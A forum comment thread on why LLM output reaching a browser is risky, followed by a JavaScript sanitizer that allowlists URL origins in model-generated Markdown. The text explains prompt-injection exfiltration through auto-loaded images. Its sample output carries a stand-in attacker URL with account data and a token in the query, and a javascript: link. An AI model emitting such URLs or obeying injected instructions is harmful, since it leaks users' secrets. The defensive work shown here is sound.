Comment by quuxplusone

3 days ago

Your elaboration seems to assume that you already have (C). I was asking, how do you get to (C) — what made you say "(C) extends to any situation where any of your users can even access the output of a chat or other generated text"?

I think it’s because the state is leaving the backend server running the LLM and being output to the browser, where various attacks are possible that send requests out to the internet (either directly or through social engineering).

Avoiding (C) means the output is strictly used within your system.

These problems will never be fully solved given how LLMs work… system prompts, user inputs, at the end of the day it’s all just input to the model.
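The "output reaches the browser" situation described in the comment above, as an added example that is not part of the thread: once a prompt-injected model's text is rendered as Markdown, an image such as `![x](https://attacker.example/?d=SECRET)` makes the victim's browser fetch the URL and carry the secret out, with no click needed; a link only needs one click (the social-engineering path). The sanitizer below allows image and link URLs only when their origin is on an allowlist and fails closed on anything else (non-http(s) schemes, relative or malformed URLs). All hostnames, the allowlist and the sample model output are constructed for the example.

```javascript
// Added example (not from the thread): origin-allowlisting URLs in LLM output before a
// browser renders it, to close the Markdown-image exfiltration channel.

// Matches Markdown images `![alt](url)` (group 1 = "!") and links `[text](url)` (group 1 = "").
const MARKDOWN_LINK_RE = /(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;

// Returns the http(s) origin of an absolute URL, or null for anything we refuse to let through:
// other schemes (data:, javascript:, ...), relative references, or strings that do not parse.
function urlOrigin(rawUrl) {
  try {
    const u = new URL(rawUrl);
    if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
    return u.origin;
  } catch {
    return null; // relative or malformed: fail closed rather than guess a base origin
  }
}

// Rewrites model output so that only URLs on allowlisted origins survive.
// Images from other origins are replaced by a visible marker; links keep their label
// but lose the destination. Returns the cleaned text and what was blocked, for logging.
function sanitizeLlmOutput(text, allowedOrigins) {
  const allowed = new Set(allowedOrigins);
  const blocked = [];
  const cleaned = text.replace(MARKDOWN_LINK_RE, (match, bang, label, url) => {
    const origin = urlOrigin(url);
    if (origin !== null && allowed.has(origin)) return match;
    blocked.push({ kind: bang ? 'image' : 'link', url });
    return bang ? `[image removed: ${label || 'untitled'}]` : label;
  });
  return { text: cleaned, blocked };
}

// Constructed sample: an injected instruction got the model to echo account data into an
// image URL on a host the attacker controls, next to legitimate links the app should keep.
const SAMPLE_OUTPUT = [
  'Here is your summary. ![status](https://attacker.example/px.gif?d=acct%3D4242%3Btoken%3Dabc)',
  'See the docs at [our guide](https://docs.example.com/guide) and ![logo](https://cdn.example.com/logo.png).',
  'Also [click me](javascript:alert%281%29).',
].join('\n');

// Constructed allowlist: the origins this hypothetical app is willing to load or link to.
const ALLOWED_ORIGINS = ['https://docs.example.com', 'https://cdn.example.com'];

function demo() {
  return sanitizeLlmOutput(SAMPLE_OUTPUT, ALLOWED_ORIGINS);
}

console.log(JSON.stringify(demo(), null, 2));
```

This handles only the Markdown-to-HTML channel; if the output is also pasted into raw HTML, a templating engine or some other sink, each of those needs its own check, and the comment's point stands: an allowlisted link still works as a phishing lure, so the mitigation reduces the automatic exfiltration path rather than removing (C).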